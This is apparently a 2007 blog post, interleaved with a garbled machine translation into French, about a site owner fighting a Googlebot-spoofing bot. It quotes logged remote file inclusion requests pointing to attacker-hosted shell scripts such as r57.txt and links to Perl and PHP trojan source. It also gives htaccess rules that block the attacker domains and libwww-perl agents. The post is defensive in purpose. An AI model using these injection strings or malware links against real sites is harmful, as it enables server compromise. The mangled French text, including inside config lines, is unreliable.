Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan Masse d'injection de code à distance que le robot Googlebot - Spoofing de paquets Perl & Trojan bot

For this past three days this blog is suffering DOS attack . Pour cela ces trois derniers jours de ce blog est attaque de déni de la souffrance. The attack is still alive now I don’t think they will leave yet. L'attaque est encore en vie, maintenant, je ne pense pas qu'ils vont laisser pour le moment.

I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. I cant interdit ce robot directement comme ils ont été l'envoi de forger des paquets (paquet d'usurpation d'identité) que le robot Googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP. Im toujours à la recherche de la bonne fournisseur de services Internet.

 OrgName: Google Inc. OrgName: Google Inc 
 OrgID: GOGL OrgID: Gogl 
 Address: 1600 Amphitheatre Parkway Adresse: 1600 Parkway Amphithéâtre 
 City: Mountain View Ville: Mountain View 
 StateProv: CA StateProv: CA 
 PostalCode: 94043 Code postal: 94043 
 Country: US Pays: États-Unis 

At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. À l'heure actuelle je bloqué à distance tous les flux aléatoire de leur hôte et *. com "perl bot signature", mais le blocage ne sera pas les empêcher de marteler ce site. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later. Je vais envoyer 503 (Service non disponible) sur certains demande donc si vous avez des problème d'accéder à ce site s'il vous plaît vérifier ultérieurement.

Type of injections Type d'injections

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. Il est beaucoup uri paramètre dans mon logs (je handicapés logs du serveur - limite des ressources) qui a probablement un grand inventaires des listes de contrôle de CMS vulnérabilités connues. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page. Je ne peux que confirmer que c'est un blackhat seo spams bot comme ils URI de la demande comprennent la typique order.php page.

 /es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja / es / wordpress / how-to-wordpress-enlevée-net-en-spam-injection-infectés par micro-ja 
  gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? gger-goro-class-mailphp/order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? 
 /es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? / es / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? 
 /order.php?wp=http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt? 

To view the following source you need to exclude the website host from your anti-virus program. Pour consulter les sources suivantes, vous avez besoin d'exclure l'hébergeur du site à partir de votre logiciel anti-virus.

• Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt Perl / ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
• PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz PHP / Cheval de Troie Rst.S - http://hom3.t35.com/xpl/fidz

htaccess blocked bad Code Injector and Perl Bot (Botnet) htaccess mal bloqué Code injecteur et Perl Bot (botnet)

If you has similar problems. Si vous a des problèmes similaires. you should block the following domain in your htaccess. vous devez bloquer le domaine suivant dans votre htaccess.
mod_setenvif

 SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Emabe \. Com" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Pawang \. Dans" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Gw-or \. Net" codeinjector_ref = 1 
 SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1 SetEnvIfNoCase User-Agent "^ libwww-perl *" shell_bots = 1 
 SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1 SetEnvIfNoCase User-Agent "^ Amidalla *" shell_bots = 1 

 <FilesMatch "(.*)"> <FilesMatch "(.*)"> 
 Order Allow,Deny Afin de permettre, nier 
 Allow from all Permettre de tous les 
 Deny from env=codeinjector_ref Refuser de env = codeinjector_ref 
 Deny from env=shell_bots Refuser de env = shell_bots 
 </FilesMatch> </ FilesMatch> 

if u arent sure if you server support mod_setenvif wrap it like the below example. Si U recréer sûr si vous mod_setenvif support du serveur de synthèse comme l'exemple ci-dessous.

 <IfModule mod_setenvif.c> <IfModule Mod_setenvif.c> 
 #...replace this line with the above code... ... # remplacer cette ligne avec le code ci-dessus ... 
 </IfModule> </ IfModule> 

How to trap Perl Shell Bot Comment piège Perl Shell Bot

We need a pattern to trap this bots. Nous avons besoin d'un modèle de ce piège robots. certainly we knew that these bots : certes, nous savions que ces robots:

• doesn’t honor robot.txt ne respecte pas robot.txt
• they crawl all subdirectory d'explorer la totalité de leur sous-répertoire
• they has a pattern URI request ils ont un modèle URI demande

For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. Pour l'instant je ne sous-répertoire pour créer des auto-ban (et d'autres choses) sur la base de leur modèle. alexa bot will be banned too as they dont honor robot.txt. Alexa bot seront interdits car ils trop d'honneur dont robot.txt.

I’ll be updating this post from time to time. Je vais être mise à jour de ce poste de temps en temps. Do check the related articles on how to packet spoofing and validating forge/spoof packet. Vérifiez les articles sur la façon de paquet d'usurpation d'identité et la validation de forge / faux paquet.

Recent Scan & Update Récentes de numérisation et de mise à jour

The below list is automatically added. La liste ci-dessous est automatiquement ajouté.

December 24, 2007 Décembre 24, 2007

ip: 64.26.63.10 param: login= , ? inject: http://pawang.in/r57.txt ip: 64.26.63.10 param: login =,? injecter: http://pawang.in/r57.txt

December 24, 2007 Décembre 24, 2007

ip: 64.26.63.10 param: dir= , login= inject: http://pawang.in/r57.txt???? ip: 64.26.63.10 param: dir =, = login injecter: http://pawang.in/r57.txt?

December 25, 2007 Décembre 25, 2007

ip: 59.158.128.138 param: p= , :allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt ip: 59.158.128.138 param: p =,: = injecter allinurl: http://gw-gold.net/jpg/pictures/test.txt

External Resources Ressources externes

• Packet spoofing - http://www.wireshark.org Paquet usurpation d'identité - http://www.wireshark.org
• pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/ pcapdiff valider paquet forgé http://www.eff.org/testyourisp/pcapdiff/